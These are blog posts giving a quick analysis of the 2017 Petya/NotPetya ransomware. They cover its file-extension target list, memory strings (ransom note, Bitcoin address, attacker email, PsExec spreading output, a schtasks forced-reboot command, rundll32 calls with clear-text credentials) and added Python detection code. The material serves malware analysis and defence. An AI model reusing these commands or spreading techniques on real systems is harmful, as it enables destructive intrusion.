<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxSCBBzI4raLgFVitx2e6e0iQiMP_VGpFldoQKqyI-GVZbVWqIZBH2ou3Txv5_0mN26MxbABBxdOsDb8Gr4YQPUuPwDBg1nG8KEawAdwFwAa7flzBzjlBimyDfs1r7g-mBaQ8I0qGfAyL/s1600/repairing2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="891" data-original-width="1193" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxSCBBzI4raLgFVitx2e6e0iQiMP_VGpFldoQKqyI-GVZbVWqIZBH2ou3Txv5_0mN26MxbABBxdOsDb8Gr4YQPUuPwDBg1nG8KEawAdwFwAa7flzBzjlBimyDfs1r7g-mBaQ8I0qGfAyL/s400/repairing2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
All the familiar messages.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBnVt1B0gLOqcsV_4nQ2Saq8TlHzTIuMRiY4uqHyM1-U89WGHbfNwPaIhErFNz38KQa-t7d50d1iC-u6QI1rLwnKg9qOr7tBVvjkeJf2_nQP1EjKRbg3DHUTCh4Fs-j6BrvRJNrtik5PQ3/s1600/notes6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="277" data-original-width="1281" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBnVt1B0gLOqcsV_4nQ2Saq8TlHzTIuMRiY4uqHyM1-U89WGHbfNwPaIhErFNz38KQa-t7d50d1iC-u6QI1rLwnKg9qOr7tBVvjkeJf2_nQP1EjKRbg3DHUTCh4Fs-j6BrvRJNrtik5PQ3/s400/notes6.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAg0dw7LNQz7z1Qd6MwywBte2E7pk8nBkpXKpuQKaX2m4MnxfG9GZIVc7cGO8odTnEAGcr2JTstyI-hOEK_ZuvVfv43QhFHgkCuJI8_FdG4kXnRg4jlvYtob7XbekoNEcnweOEYq3fxFzJ/s1600/notes4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="607" data-original-width="1183" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAg0dw7LNQz7z1Qd6MwywBte2E7pk8nBkpXKpuQKaX2m4MnxfG9GZIVc7cGO8odTnEAGcr2JTstyI-hOEK_ZuvVfv43QhFHgkCuJI8_FdG4kXnRg4jlvYtob7XbekoNEcnweOEYq3fxFzJ/s400/notes4.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip04rT44N4JRrqV-xasRmCnaFpV3XIKJ25MdmlkzV6mRcMdOeXzAlb7UfsIOJSno8h0tXuuNfS274t8gXx3r1VDbHW-9fhGkfBl-PukCh6Hq1QugQlsIUOTMIiDd2jA0E6-OenD2yuBb3z/s1600/notes5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="617" data-original-width="1181" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip04rT44N4JRrqV-xasRmCnaFpV3XIKJ25MdmlkzV6mRcMdOeXzAlb7UfsIOJSno8h0tXuuNfS274t8gXx3r1VDbHW-9fhGkfBl-PukCh6Hq1QugQlsIUOTMIiDd2jA0E6-OenD2yuBb3z/s400/notes5.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Tyoubl9O_A2WKjwXpAvH0Zi6GWYcdqd3_SnFwFlR9vtllzd8HhGCiV4P-m_RiLNAEpd544bjYxG6nIy8mjSw_iYmkbtxon311QF4Ux3PZsTwFqrcZ80sJnMAAWfQvhOsNWJD1FrvcxiN/s1600/repairing3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="679" data-original-width="1199" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Tyoubl9O_A2WKjwXpAvH0Zi6GWYcdqd3_SnFwFlR9vtllzd8HhGCiV4P-m_RiLNAEpd544bjYxG6nIy8mjSw_iYmkbtxon311QF4Ux3PZsTwFqrcZ80sJnMAAWfQvhOsNWJD1FrvcxiN/s400/repairing3.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
And here's all the WMI stuff.</div>
<div class="separator" style="clear: both; text-align: left;">
Also, note that rundll32.exe is called with '%s' as its argument, which is perfc.dat in this case. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimzT6tMmNk-d9vDPP85oxn7M8YemIpDvsanCIGiGlZ2QnQHN_IND26Z0tbHeL-Ie3YqQQjXNAOCBFBCBinCfEJgRhUIUxDRu6HuciGTLrUe3SEckwdiSbr4_83RQmHe4iF62sqSz5vA-QO/s1600/dllhost-psexec-execution2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="1433" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimzT6tMmNk-d9vDPP85oxn7M8YemIpDvsanCIGiGlZ2QnQHN_IND26Z0tbHeL-Ie3YqQQjXNAOCBFBCBinCfEJgRhUIUxDRu6HuciGTLrUe3SEckwdiSbr4_83RQmHe4iF62sqSz5vA-QO/s400/dllhost-psexec-execution2.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Running PSExec on the entire subnet, after accepting the EULA of course :) <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxcUNAEaYIakk-Gnn-aET8UY0OtovLqQ5QIlW8fOhyphenhyphenY9AuEHZscndvfyB8CZINXm-2wgP5pX5ba9KI4Nb6jhEWSDj4oXaFhpeQT45tOAoxBWZVwNNJcKWs-oUzf_pYm4QTxt6u801-7D1L/s1600/dllhost-psexec-execution.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="623" data-original-width="1233" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxcUNAEaYIakk-Gnn-aET8UY0OtovLqQ5QIlW8fOhyphenhyphenY9AuEHZscndvfyB8CZINXm-2wgP5pX5ba9KI4Nb6jhEWSDj4oXaFhpeQT45tOAoxBWZVwNNJcKWs-oUzf_pYm4QTxt6u801-7D1L/s400/dllhost-psexec-execution.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
Extensions to be encrypted.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg38HX1eIBjFb7iaoNKJoKkbdk95HRgGbHz5RRjvEX3zjF-hzs72WyQv2LBJsaeWPqgJDlRGfO9fukVW2GIl61WxJ1D7jRjHRmMQhhgFC2BbR6w9slb3NWdWX_36lhBPrSVfuE-zy55eY34/s1600/keys.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="321" data-original-width="1191" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg38HX1eIBjFb7iaoNKJoKkbdk95HRgGbHz5RRjvEX3zjF-hzs72WyQv2LBJsaeWPqgJDlRGfO9fukVW2GIl61WxJ1D7jRjHRmMQhhgFC2BbR6w9slb3NWdWX_36lhBPrSVfuE-zy55eY34/s400/keys.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
It checks for the extensions it wants to encrypt. The list is hard-coded and differs from the one seen in the Petya variant of mid-2016.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi54pxN_vaZN1XfrfqX73nxoWPB3aZXvro9z5AE7X9enDegN2vIl5iBe7eBSz0EhCG14goWUeAW-QPeOB7PlRIwpv1TqM8GWNOvEDOacaWq9I3qyTugxbDaVWv6YIf7-RIjlOhemjTmp0fD/s1600/7-extentions.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="253" data-original-width="911" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi54pxN_vaZN1XfrfqX73nxoWPB3aZXvro9z5AE7X9enDegN2vIl5iBe7eBSz0EhCG14goWUeAW-QPeOB7PlRIwpv1TqM8GWNOvEDOacaWq9I3qyTugxbDaVWv6YIf7-RIjlOhemjTmp0fD/s400/7-extentions.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiKkEIayXH1xstzDnFFHzD0Hmc7RcmaEG-6-ZOKuATtPKTVDJe0E2Y4X_dqxtmWU1eD3VL05Yu9prPyhNa3Q1Ba_8K1M9Iw7J6SUVMIHZFR8lEQv_naDkoCnxIsJb2HuylQrLpumVpLtQK/s1600/7a-ext.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="463" data-original-width="1035" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiKkEIayXH1xstzDnFFHzD0Hmc7RcmaEG-6-ZOKuATtPKTVDJe0E2Y4X_dqxtmWU1eD3VL05Yu9prPyhNa3Q1Ba_8K1M9Iw7J6SUVMIHZFR8lEQv_naDkoCnxIsJb2HuylQrLpumVpLtQK/s400/7a-ext.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Encryption part.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjre-8Q3CSoLcn0qZJx_fz2M3loox0fQtSpWzGAWtdjXHjsQP8Wb6Tu7bX_J470ZlBd2t5oZKC2X6bfoDWU8NLeCdm5eJpFaw5oeXSQvnXzCZFPI7weT5xJwZGxicUeCUj9fb44L3NaLRB/s1600/2-crypt-aqcuire-context.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="441" data-original-width="1091" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjre-8Q3CSoLcn0qZJx_fz2M3loox0fQtSpWzGAWtdjXHjsQP8Wb6Tu7bX_J470ZlBd2t5oZKC2X6bfoDWU8NLeCdm5eJpFaw5oeXSQvnXzCZFPI7weT5xJwZGxicUeCUj9fb44L3NaLRB/s400/2-crypt-aqcuire-context.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSY9W6tYz_8ynbWkAYaxXZtyYSgWfAfbPyLZ-Y48Wz8TD6upzm37ZVwcLBuXlBtV9MsStUyat6t_po5c9_hWNYFD5uU8hw-aHU8xZh9vKcp1tJy5D4D_vWGfQ4DN8SGF_n_g3_p8kqaI-n/s1600/3-crypt-random.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="409" data-original-width="995" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSY9W6tYz_8ynbWkAYaxXZtyYSgWfAfbPyLZ-Y48Wz8TD6upzm37ZVwcLBuXlBtV9MsStUyat6t_po5c9_hWNYFD5uU8hw-aHU8xZh9vKcp1tJy5D4D_vWGfQ4DN8SGF_n_g3_p8kqaI-n/s400/3-crypt-random.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKyxgjw_EGYdgzUcZ4veP-xWxHUUpJX-Z7aqE0TRKUhTbTPIYOA1qokpCQeDtGOdvasqTdlj5x-yw1iDra1dCAfULZBIuppt8xtdLirSZlcLa_DUOCP5NGQYTJ7lz1LMqUdgV24qYeStzB/s1600/4-crypt-release.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="457" data-original-width="1287" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKyxgjw_EGYdgzUcZ4veP-xWxHUUpJX-Z7aqE0TRKUhTbTPIYOA1qokpCQeDtGOdvasqTdlj5x-yw1iDra1dCAfULZBIuppt8xtdLirSZlcLa_DUOCP5NGQYTJ7lz1LMqUdgV24qYeStzB/s400/4-crypt-release.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And here are all the encryption functions that are called.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwpV9BBddqsnGsqrHGw3BkHe-4HhRC2YYwmcmwV7oxzZABnWh3mMMgWs-w9-qfKUWtKwYJUKKCtvrGR3eRet4zTXmyHSs71XGoRFAAW1YyXX41Cjq2PdBcjG_gfkihBwUwh37pww6-tQFK/s1600/complete-encr-routine.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1077" data-original-width="711" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwpV9BBddqsnGsqrHGw3BkHe-4HhRC2YYwmcmwV7oxzZABnWh3mMMgWs-w9-qfKUWtKwYJUKKCtvrGR3eRet4zTXmyHSs71XGoRFAAW1YyXX41Cjq2PdBcjG_gfkihBwUwh37pww6-tQFK/s400/complete-encr-routine.PNG" width="263" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Like I said earlier, this is a quick look into the malware, not a detailed analysis. But it should give you some insight into how it works. </div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-12392103148636399012017-06-27T21:01:00.000-07:002017-06-27T21:01:15.471-07:00Petya extensions targeted<div dir="ltr" style="text-align: left;" trbidi="on">
.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb<br />
.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql<br />
.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.</div>
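The list above is a single dot-delimited string, which is also how the quick-look post shows it in the disassembly. As an added example, not code from the post, the block below parses that string and compares the delimited ".ext." lookup (which the leading and trailing dots make possible) with a naive substring search that over-matches; the function names are mine, and the assumption that only a file's last extension is compared is mine as well.

```python
import os

# The hard-coded target list as the single dot-delimited string quoted
# in the post (the three quoted lines joined back together).
TARGET_EXTENSIONS_RAW = (
    ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb"
    ".gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql"
    ".tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip."
)


def parse_extension_list(raw: str) -> frozenset:
    """Split the dot-delimited list into a set of lowercase extensions (no dots)."""
    return frozenset(part.lower() for part in raw.split(".") if part)


TARGET_EXTENSIONS = parse_extension_list(TARGET_EXTENSIONS_RAW)


def _extension(path: str) -> str:
    """Lowercase last extension of a path including its dot, or "" if none.
    (Assumption: only the last extension is compared, so a.tar.gz is ".gz".)"""
    return os.path.splitext(path)[1].lower()


def is_targeted(path: str) -> bool:
    """Set lookup on the last extension; the analyst-friendly form."""
    ext = _extension(path)
    return bool(ext) and ext[1:] in TARGET_EXTENSIONS


def is_targeted_delimited_search(path: str) -> bool:
    """Delimited substring search, the form a single-string list lends itself
    to in native code: look for ".ext." so ".c." cannot match ".cpp." or ".cfg."
    The leading and trailing dots in the list exist for exactly this reason."""
    ext = _extension(path)
    return bool(ext) and (ext + ".") in TARGET_EXTENSIONS_RAW


def naive_search(path: str) -> bool:
    """For comparison: the same search without the trailing delimiter, which
    over-matches (".md" hits ".mdb.", ".cp" hits ".cpp.")."""
    ext = _extension(path)
    return bool(ext) and ext in TARGET_EXTENSIONS_RAW


def targeted_files(paths):
    """Filter a directory listing down to the files the list would select."""
    return [p for p in paths if is_targeted(p)]
```

Running `targeted_files` over a listing of a test share gives a quick picture of which documents a sample with this list would touch; note that .txt, .jpg and .exe are not on it.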
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-584753087503969012017-06-27T20:02:00.000-07:002017-06-27T20:02:36.961-07:00Petya Mem Strings<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: x-small;">Some interesting strings pulled from the Petya executable:</span><br />
<span style="font-size: x-small;"> </span><br />
<br />
<span style="font-size: x-small;"><assemblyIdentity</span><br />
<span style="font-size: x-small;"> version="5.1.0.0"</span><br />
<span style="font-size: x-small;"> processorArchitecture="x86"</span><br />
<span style="font-size: x-small;"> name="Microsoft.Windows.Shutdown"</span><br />
<span style="font-size: x-small;"> type="win32"</span><br />
<span style="font-size: x-small;"><description>Windows Shutdown and Annotation Tool</description></span><br />
<span style="font-size: x-small;"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"></span><br />
<span style="font-size: x-small;"> <security></span><br />
<span style="font-size: x-small;"> <requestedPrivileges></span><br />
<span style="font-size: x-small;"> <requestedExecutionLevel</span><br />
<span style="font-size: x-small;"> level="asInvoker"</span><br />
<span style="font-size: x-small;"> uiAccess="false"</span><br />
<span style="font-size: x-small;"> /></span><br />
<span style="font-size: x-small;"> </requestedPrivileges></span><br />
<span style="font-size: x-small;"> </security></span><br />
<span style="font-size: x-small;"></trustInfo></span><br />
<span style="font-size: x-small;"></assembly></span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">00026671-00002512,dllhost.dat,"%WINDIR%\dllhost.dat",2512,2880,2017-6-27.07:45:34.603,"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"""</span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">c:\src\Pstools\psexec\EXE\Release\psexec.pdb</span><br />
<span style="font-size: x-small;">c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb</span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">Direct PsExec to run the application on the remote</span><br />
<span style="font-size: x-small;">computer or computers specified. If you omit the computer</span><br />
<span style="font-size: x-small;">ComputerName</span><br />
<span style="font-size: x-small;">CONIN$</span><br />
<span style="font-size: x-small;">Connecting to 192.168.xx.xx...</span><br />
<span style="font-size: x-small;">Connecting to 192.168.xx.xx...</span><br />
<span style="font-size: x-small;"> </span><br />
<span style="font-size: x-small;">Starting PsExec service on 192.168.xx.xx...</span><br />
<span style="font-size: x-small;"> </span><br />
<span style="font-size: x-small;">Connecting with PsExec service on 192.168.xx.xx...</span><br />
<span style="font-size: x-small;"> </span><br />
<span style="font-size: x-small;">Starting %WINDIR%\System32\rundll32.exe on 192.168.xx.xx...</span><br />
<span style="font-size: x-small;">Connecting with PsExec service on 192.168.xx.xx...</span><br />
<span style="font-size: x-small;">ConnectNamedPipe</span><br />
<span style="font-size: x-small;">CONOUT$</span><br />
<span style="font-size: x-small;">ControlService</span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">that file and print sharing services are enabled on %s.</span><br />
<span style="font-size: x-small;">the password is transmitted in clear text to the remote system.</span><br />
<span style="font-size: x-small;">This application has requested the Runtime to terminate it in an unusual way.</span><br />
<span style="font-size: x-small;">Please contact the application's support team for more information.</span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">Usage: psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd][-n s][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]</span><br />
<span style="font-size: x-small;">UseDelayedAcceptance</span><br />
<br />
<br />
<span style="font-size: x-small;">00024659-00002880,rundll32.exe,"%WINDIR%\System32\rundll32.exe",2880,2292,2017-6-27.06:42:15.996,"C:\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1""<br />1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX<br />2. Send your Bitcoin wallet ID and personal installation key to e-mail<br />[j j <br />\Sessions\1\Windows\ApiPort<br />\ThemeApiPort<br />AddressFamily<br />AppData<br />AQIAAA5mAAAApAAA6vAGjmKL1o/z1WoWFbD8HoXQxvta/l23/sisYXlY3R/b2LYb<br />GBVOO2YNwJuwEsKdn6WHHKMbDnT/orfba9XaLwwelJeehFIraOnQSXSuVih7CWRJ<br />AuthenticodeEnabled<br />AutodialDLL</span><br />
<br />
<span style="font-size: x-small;">DhcpDomain<br />DhcpNameServer<br />Dhcpv6Domain<br />Disable<br />DisableBranchCache<br />DisableEngine<br />DisableImprovedZoneCheck<br />DisableLocalOverride<br />DisableMetaFiles<br />DisableUserModeCallbackFilter<br />DisplayString<br />dllhost.dat</span><br />
<br />
<span style="font-size: x-small;">Enabled<br />EnableDhcp<br />EnableLinkedConnections<br />EnablePunycode<br />Export<br />FE04.tmp<br />FipsAlgorithmPolicy<br />HelperDllName<br />Hostname<br />Image Path<br />l your files safely and easily. All you<br /> need to do is submit the payment and purchase the decryption key.<br /> Please follow the instructions:<br /> 1. Send $300 worth of Bitcoin to following address:</span><br />
<br />
<span style="font-size: x-small;">Ooops, your important files are encrypted.<br />If you see this text, then your files are no longer accessible, because<br />they have b<br />PackedCatalogItem<br />PageAllocatorSystemHeapIsPrivate</span><br />
<br />
<span style="font-size: x-small;">TROY ALL OF YOUR DATA! PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED<br /> IN!<br />Type<br />UseDelayedAcceptance<br />UseHostnameAsAlias<br />UseOldHostResolutionOrder<br />Users<br />Version<br />Webclient<br />Windows<br />WinHttpSettings<br />WinSock 2.0 Provider ID<br />WinSock_Registry_Version<br />wowsmith123456@posteo.net.</span><br />
<br />
<span style="font-size: x-small;">00026129-00001968,FE04.tmp,"%TEMP%\FE04.tmp",1968,2880,2017-6-27.06:45:10.817,"%TEMP%\FE04.tmp" \\.\pipe\{E532AB34-D5C5-4AA8-9511-A05572AE75BC}""<br />%OSUSER%-PC\%OSUSER%:123456</span><br />
<br />
<span style="font-size: x-small;">00026131-00002720,schtasks.exe,"%WINDIR%\System32\schtasks.exe",2720,2724,2017-6-27.06:45:08.804,"" /TR "%WINDIR%\system32\shutdown.exe /r /f" /ST 07:45""<br />(40,4):LogonType:<br />ERROR:<br />ERROR: No mapping between account names and security IDs was done.<br />No mapping between account names and security IDs was done.<br />00026195-00002796,shutdown.exe,"%WINDIR%\System32\shutdown.exe",2796,1820,2017-6-27.06:45:09.425,"%WINDIR%\system32\shutdown.exe" /r /f""<br />0 0(000</span><br />
<br />
<span style="font-size: x-small;">Shutdown and Annotation Tool<br />00026671-00002512,dllhost.dat,"%WINDIR%\dllhost.dat",2512,2880,2017-6-27.07:45:34.603,"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"""<br />!This program cannot be run in DOS mode.<br />"%WINDIR%\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin.dll",#1 10 "%OSUSER%-PC\%OSUSER%:123456"</span><br />
<br />
<span style="font-size: x-small;">%WINDIR%\System32\rundll32.exe started on 192.168.56.11 with process ID 2996.</span><br />
<br />
<span style="font-size: x-small;"> </span></div>
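The process records in the dump above (the rundll32.exe, dllhost.dat, schtasks.exe and shutdown.exe lines) carry the behaviours a defender can alert on: a DLL-like file run by ordinal entry point, a clear-text credential on a command line, a child of rundll32.exe, and a scheduled task that forces a reboot. As an added example, not code from the post, the block below runs those checks over records constructed in the same shape; the field order (id, image, path, pid, ppid, timestamp, command line) is inferred from the quoted lines and the DLL path uses the perfc.dat name from the quick-look post instead of the hash-named file.

```python
import re
from typing import Dict, List

# Constructed records for the example, modelled on the sandbox process log
# quoted in the post: id,image,path,pid,ppid,timestamp,command line.
# The DLL name is a stand-in; the post's record names the sample by hash.
SAMPLE_RECORDS = [
    '00024659-00002880,rundll32.exe,"%WINDIR%\\System32\\rundll32.exe",2880,2292,'
    '2017-6-27.06:42:15.996,"C:\\perfc.dat",#1',
    '00026671-00002512,dllhost.dat,"%WINDIR%\\dllhost.dat",2512,2880,'
    '2017-6-27.07:45:34.603,"%WINDIR%\\perfc.dat",#1 10 "%OSUSER%-PC\\%OSUSER%:123456"',
    '00026131-00002720,schtasks.exe,"%WINDIR%\\System32\\schtasks.exe",2720,2724,'
    '2017-6-27.06:45:08.804,"" /TR "%WINDIR%\\system32\\shutdown.exe /r /f" /ST 07:45',
    '00026999-00003100,notepad.exe,"%WINDIR%\\System32\\notepad.exe",3100,2724,'
    '2017-6-27.06:50:00.000,"%WINDIR%\\System32\\notepad.exe" notes.txt',
]

# A .dll/.dat file invoked by ordinal entry point, e.g. ...perfc.dat",#1
ORDINAL_ENTRY_RE = re.compile(r'\.(?:dll|dat)",?\s*#\d+', re.IGNORECASE)
# A quoted "host\user:password" token, the PsExec-style clear-text credential
INLINE_CRED_RE = re.compile(r'"[^"\s]+\\[^"\\:]+:[^"]+"')
# A scheduled task whose action is a forced reboot through shutdown.exe /r
REBOOT_TASK_RE = re.compile(r'/TR\s+"[^"]*shutdown\.exe[^"]*\s/r(\s|")', re.IGNORECASE)


def parse_record(line: str) -> Dict[str, object]:
    """Split one record; the command line is the 7th field and may hold commas."""
    parts = line.split(",", 6)
    if len(parts) != 7:
        raise ValueError("malformed record: " + line)
    return {"id": parts[0], "image": parts[1].lower(), "path": parts[2].strip('"'),
            "pid": int(parts[3]), "ppid": int(parts[4]), "time": parts[5],
            "cmdline": parts[6]}


def analyse(lines: List[str]) -> Dict[str, List[str]]:
    """Return {record id: [finding, ...]} for every record that trips a rule."""
    records = [parse_record(line) for line in lines]
    image_by_pid = {r["pid"]: r["image"] for r in records}
    findings: Dict[str, List[str]] = {}
    for r in records:
        hits = []
        if ORDINAL_ENTRY_RE.search(r["cmdline"]):
            hits.append("dll-like file invoked by ordinal entry point")
        if INLINE_CRED_RE.search(r["cmdline"]):
            hits.append("clear-text credential passed on the command line")
        if r["image"] == "schtasks.exe" and REBOOT_TASK_RE.search(r["cmdline"]):
            hits.append("scheduled task forces a reboot")
        if image_by_pid.get(r["ppid"]) == "rundll32.exe" and r["image"] != "rundll32.exe":
            hits.append("spawned by rundll32.exe")
        if hits:
            findings[r["id"]] = hits
    return findings
```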
Unknownnoreply@blogger.com0